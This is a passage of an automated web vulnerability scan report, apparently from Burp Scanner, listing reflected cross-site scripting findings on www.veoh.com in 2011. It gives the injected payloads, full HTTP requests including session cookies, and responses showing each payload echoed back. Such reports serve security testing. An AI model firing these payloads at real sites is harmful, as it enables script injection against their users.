Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 76407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=35
Content-Length: 94943
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 94943
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=33
Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:58 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=95
Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=47
Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=14
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 76304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea> ...[SNIP]...
